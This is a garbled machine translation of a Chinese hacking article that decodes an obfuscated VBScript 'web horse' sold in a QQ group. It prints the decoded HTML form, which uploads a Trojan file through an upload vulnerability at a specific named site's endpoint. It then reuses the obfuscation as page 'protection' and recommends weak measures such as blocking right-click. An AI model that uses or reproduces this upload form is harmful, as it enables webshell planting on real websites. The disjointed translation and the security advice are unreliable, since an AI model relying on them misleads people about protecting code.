Cracking and utilization of an ASC encrypted network horse

Comments: Some people in the QQ group are selling web horses. The netizen spent money to get a share for me and let me see. So we have the following article. 1. Exploring the Web horse to open the Web horse in the browser. This web horse has simple functions and is mainly used to upload more powerful web horses. The unique feature is the upload vulnerability on the target webpage, which allows you to modify and modify the configuration on your own. View the Internet Trojan QQ group. Someone is selling it. The netizen spent money to get a share for me and let me see. So we have the following article.
1. Exploring network horse

Open the Web horse in the browser. This web horse is simple and mainly used to upload a more powerful web horse. The unique feature is the upload vulnerability on the target webpage, which allows you to modify and modify the configuration on your own. Check the source code of the Trojan and find that the trojan is encrypted. It is obviously encrypted by ASC. (Figure 1)

500) this. width = 500 "title =" Click here to browse images in a new window "/>

2. Network horse Analysis

Although the core function code of the network horse is ASC encrypted, its framework is clear at a glance. The code and its interpretation are as follows:

<Script language = vbscript>
'You can see that the Web horse is a VB script.
Function rechange (k)
'Defines a rechange function, which defines a variable k
S = Split (k ,",")
'Split separates k from ',' and defines it as an array.
T = ""
Assign a null value to t;
For I = 0 To UBound (s)
T = t Chrw (eval (s (I )))
Use for cyclic conversion, convert the tvalue into characters, and accumulate values in turn. UBound is the dimension of the array, and Chrw is the character conversion function.
Next
Rechange = t
Returns t to the function.
End Function
T = "104,116,109,108, 110,115,105,116,105,111,110, 97,108 ,......"
'N is omitted in the middle, which is the functional code of the Web horse.
Document. write rechange (t)
'Output function values in the browser
</Script>


3. Network horse decryption

You can compile an ASC decryption tool by yourself. I downloaded someone else's ASC decryption code from the Internet, and then modified and re-compiled the decryption tool based on the encryption principle of the network horse.

Run the tool to copy the value after source code t of the network horse to the corresponding text box of the tool and click decrypt to restore the source code of the network horse. (Figure 2)

500) this. width = 500 "title =" Click here to browse images in a new window "/>

<Body>
<Form action = http://www.51iccard.com/upfile_other.asp method = post name = form1 onsubmit = return
Click () enctype = multipart/form-data>
<P align = "center"> <span class = "STYLE4"> source (</span> <span class = "STYLE3"> image </span> <span class =" STYLE4 ">) file:
</Span>
<Input name = "filename" type = "file" class = "buttonUnActive" size = "20">
<Span class = "STYLE4">
Target (</span> <span class = "STYLE3"> Trojan </span> <span class = "STYLE4">) file:
</Span>
<Input name = "filename1" type = file class = buttonUnActive size = 20> </p>
<P align = "center">
<Input name = submit type = submit class = "button" style = border "1px value = upload Trojan double rgb (88.88.88); font: 9pt>
<Input name = imgwidth type = hidden id = imgwidth>
<Input name = imgheight type = hidden id = imgheight>
<Input name = aligntype type = hidden id = "channelid" value = "0">
<Input name = "channelid" type = "hidden" id = "channelurlid" value = 0>
<Input name = "id" type = "hidden" id = "id2">
</P>

4. decryption Effect
The HTML code behind the webshell decryption is saved as a test.htm file. open the file in the browser and upload the file for test. This indicates that the asc of the webshell is successfully decrypted. (Figure 3)

500) this. width = 500 "title =" Click here to browse images in a new window "/>

5. Encryption and exploitation

After the ASC encryption of the network horse is cracked, we use the encryption principle of the network horse to encrypt our webpage to protect the webpage code. ASC encryption is mainly used to protect Static Page code. Because dynamic code is on the server side, the client only displays the running results. The "IT expert network" page is dynamically generated. IT is used as an example for demonstration.

View and copy the webpage code, and convert the characters to ASC values using the ASCCII lookup tool. Then copy the generated ASC value to the Hacker code we cracked as the t value. In this way, no one else can see the source code of the Web page. Only the ASC value of the web page is displayed, which protects the Web Page code. The running effect is the same as that before encryption. (Figure 4)

500) this. width = 500 "title =" Click here to browse images in a new window "/>

Summary: ASC encryption is the main form of static webpage encryption at present. From the above author's decryption of a certain network horse, this encryption form cannot fundamentally ensure the security of webpage code. Based on my website maintenance experience and my friends, we recommend several webpage encryption methods:

1. Script encryption is implemented through script code similar to VB and JAVA: block right-click, prohibit viewing source files, and call address encryption.

2. the IIS Password is deployed for IIS security and authentication to prevent unauthorized access.

3. ASP program encryption: ASP program is used to encrypt webpages. Currently, most websites use ASP programs, which have no specific requirements on Web servers, its encryption is designed with the help of databases and ASP programs to implement a general web page encryption.

4. software Encryption: Currently there are a lot of software that encrypts webpages. The basic principle is to use javascript code, but these software has automatically prepared the code, you only need to paste the source code of the webpage and click "encrypt.